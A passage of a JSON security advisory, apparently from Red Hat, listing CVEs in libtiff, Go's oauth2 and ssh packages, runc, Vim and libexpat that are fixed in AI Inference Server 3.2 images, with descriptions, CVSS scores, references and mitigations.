"text": "A flaw was found in Libtiff. This vulnerability is a \"write-what-where\" condition, triggered when the library processes a specially crafted TIFF image file.\n\nBy providing an abnormally large image height value in the file\u0027s metadata, an attacker can trick the library into writing attacker-controlled color data to an arbitrary memory location. This memory corruption can be exploited to cause a denial of service (application crash) or to achieve arbitrary code execution with the permissions of the user.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libtiff: Libtiff Write-What-Where",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This attack requires user interaction to run the malicious TIFF image file, hence the CVE is maintained as important.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9900"
},
{
"category": "external",
"summary": "RHBZ#2392784",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392784"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9900"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9900",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9900"
},
{
"category": "external",
"summary": "https://github.com/SexyShoelessGodofWar/LibTiff-4.7.0-Write-What-Where?tab=readme-ov-file",
"url": "https://github.com/SexyShoelessGodofWar/LibTiff-4.7.0-Write-What-Where?tab=readme-ov-file"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/issues/704",
"url": "https://gitlab.com/libtiff/libtiff/-/issues/704"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/merge_requests/732",
"url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/732"
},
{
"category": "external",
"summary": "https://libtiff.gitlab.io/libtiff/releases/v4.7.1.html",
"url": "https://libtiff.gitlab.io/libtiff/releases/v4.7.1.html"
}
],
"release_date": "2025-09-22T14:29:35.767000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libtiff: Libtiff Write-What-Where"
},
{
"acknowledgments": [
{
"names": [
"jub0bs"
]
}
],
"cve": "CVE-2025-22868",
"cwe": {
"id": "CWE-1286",
"name": "Improper Validation of Syntactic Correctness of Input"
},
"discovery_date": "2025-02-26T04:00:44.350024+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2348366"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `golang.org/x/oauth2/jws` package in the token parsing component. This vulnerability is made possible because of the use of `strings.Split(token, \".\")` to split JWT tokens, which can lead to excessive memory consumption when processing maliciously crafted tokens with a large number of `.` characters. An attacker could exploit this functionality by sending numerous malformed tokens and can trigger memory exhaustion and a Denial of Service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/oauth2/jws: Unexpected memory consumption during token parsing in golang.org/x/oauth2/jws",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-22868"
},
{
"category": "external",
"summary": "RHBZ#2348366",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2348366"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-22868",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22868"
},
{
"category": "external",
"summary": "https://go.dev/cl/652155",
"url": "https://go.dev/cl/652155"
},
{
"category": "external",
"summary": "https://go.dev/issue/71490",
"url": "https://go.dev/issue/71490"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3488",
"url": "https://pkg.go.dev/vuln/GO-2025-3488"
}
],
"release_date": "2025-02-26T03:07:49.012000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, it is recommended to pre-validate any payloads passed to `go-jose` to check that they do not contain an excessive amount of `.` characters.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/oauth2/jws: Unexpected memory consumption during token parsing in golang.org/x/oauth2/jws"
},
{
"cve": "CVE-2025-22869",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-02-26T04:00:47.683125+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2348367"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the golang.org/x/crypto/ssh package. SSH clients and servers are vulnerable to increased resource consumption, possibly leading to memory exhaustion and a DoS. This can occur during key exchange when the other party is slow to respond during key exchange.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/crypto/ssh: Denial of Service in the Key Exchange of golang.org/x/crypto/ssh",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "While this flaw affects both SSH clients and servers implemented with golang.org/x/crypto/ssh, realistically the flaw will only lead to a DoS when transferring large files, greatly reducing the likelihood of exploitation.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-22869"
},
{
"category": "external",
"summary": "RHBZ#2348367",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2348367"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-22869",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22869"
},
{
"category": "external",
"summary": "https://go.dev/cl/652135",
"url": "https://go.dev/cl/652135"
},
{
"category": "external",
"summary": "https://go.dev/issue/71931",
"url": "https://go.dev/issue/71931"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3487",
"url": "https://pkg.go.dev/vuln/GO-2025-3487"
}
],
"release_date": "2025-02-26T03:07:48.855000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "This flaw can be mitigated when using the client only connecting to trusted servers.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/crypto/ssh: Denial of Service in the Key Exchange of golang.org/x/crypto/ssh"
},
{
"cve": "CVE-2025-52565",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)"
},
"discovery_date": "2025-10-17T14:19:18.653000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2404708"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in runc. CVE-2025-52565 is very similar in concept and application toCVE-2025-31133, except that it exploits a flaw in /dev/console\nbind-mounts. When creating the /dev/console bind-mount (to /dev/pts/$n), if an attacker replaces /dev/pts/$n with a symlink then runc will bind-mount the symlink target over /dev/console.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "runc: container escape with malicious config due to /dev/console mount and related races",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat considers this as an Important flaw since the impact is limited to local attack with minimal privileges in order to jeopardize the environment.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-52565"
},
{
"category": "external",
"summary": "RHBZ#2404708",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404708"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-52565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52565"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-52565",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52565"
},
{
"category": "external",
"summary": "https://github.com/opencontainers/runc/security/advisories/GHSA-qw9x-cqr3-wc7r",
"url": "https://github.com/opencontainers/runc/security/advisories/GHSA-qw9x-cqr3-wc7r"
}
],
"release_date": "2025-11-05T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Potential mitigations for this issue include:\n\n* Using user namespaces, with the host root user not mapped into the container\u0027s namespace. procfs file permissions are managed using Unix DAC and thus user namespaces stop a container process from being able to write to them.\n* Not running as a root user in the container (this includes disabling setuid binaries with noNewPrivileges). As above, procfs file permissions are managed using Unix DAC and thus non-root users cannot write to them.\n* The default SELinux policy should mitigate this issue, as the /dev/console bind-mount does not re-label the mount and so the container process should not be able to write to unsafe procfs files. However, CVE-2025-52881 allows an attacker to bypass LSM labels, and so this mitigation is not helpful when considered in combination with CVE-2025-52881.\n* The default AppArmor profile used by most runtimes will NOT help mitigate this issue, as /dev/console access is permitted. You could create a custom profile that blocks access to /dev/console, but such a profile might break regular containers. In addition, CVE-2025-52881 allows an attacker to bypass LSM labels, and so that mitigation is not helpful when considered in combination with CVE-2025-52881.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "runc: container escape with malicious config due to /dev/console mount and related races"
},
{
"cve": "CVE-2025-53905",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-07-15T21:01:19.770241+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2380362"
}
],
"notes": [
{
"category": "description",
"text": "A path traversal flaw was found in Vim. Successful exploitation can lead to overwriting sensitive files or placing executable code in privileged locations, depending on the permissions of the process editing the archive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim path traversial",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-53905"
},
{
"category": "external",
"summary": "RHBZ#2380362",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380362"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-53905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53905"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-53905",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53905"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/87757c6b0a4b2c1f71c72ea8e1438b8fb116b239",
"url": "https://github.com/vim/vim/commit/87757c6b0a4b2c1f71c72ea8e1438b8fb116b239"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-74v4-f3x9-ppvr",
"url": "https://github.com/vim/vim/security/advisories/GHSA-74v4-f3x9-ppvr"
}
],
"release_date": "2025-07-15T20:48:34.764000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim path traversial"
},
{
"cve": "CVE-2025-53906",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-07-15T21:01:15.057182+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2380360"
}
],
"notes": [
{
"category": "description",
"text": "A path traversal flaw was found in Vim. Successful exploitation can lead to overwriting sensitive files or placing executable code in privileged locations, depending on the permissions of the process editing the archive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim path traversal",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-53906"
},
{
"category": "external",
"summary": "RHBZ#2380360",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380360"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-53906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53906"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-53906",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53906"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/586294a04179d855c3d1d4ee5ea83931963680b8",
"url": "https://github.com/vim/vim/commit/586294a04179d855c3d1d4ee5ea83931963680b8"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-r2fw-9cw4-mj86",
"url": "https://github.com/vim/vim/security/advisories/GHSA-r2fw-9cw4-mj86"
}
],
"release_date": "2025-07-15T20:52:40.137000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim path traversal"
},
{
"cve": "CVE-2025-59375",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-09-15T03:00:59.775098+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2395108"
}
],
"notes": [
{
"category": "description",
"text": "A memory amplification vulnerability in libexpat allows attackers to trigger excessive dynamic memory allocations by submitting specially crafted XML input. A small input (~250 KiB) can cause the parser to allocate hundreds of megabytes, leading to denial-of-service (DoS) through memory exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "firefox: thunderbird: expat: libexpat in Expat allows attackers to trigger large dynamic memory allocations via a small document that is submitted for parsing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is Important rather than Critical because, while it allows for significant resource exhaustion leading to denial-of-service (DoS), it does not enable arbitrary code execution, data leakage, or privilege escalation. The vulnerability stems from an uncontrolled memory amplification behavior in libexpat\u2019s parser, where a relatively small XML payload can cause disproportionately large heap allocations. However, the flaw is limited in scope to service disruption and requires the attacker to submit a crafted XML document\u2014something that can be mitigated with proper input validation and memory usage limits. Therefore, while the exploitability is high, the impact is confined to availability, not confidentiality or integrity, making it a high-severity but not critical flaw.\n\nIn Firefox and Thunderbird, where libexpat is a transitive userspace dependency, exploitation usually just crashes the application (app-level DoS), so it is classified as Moderate instead of Important.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
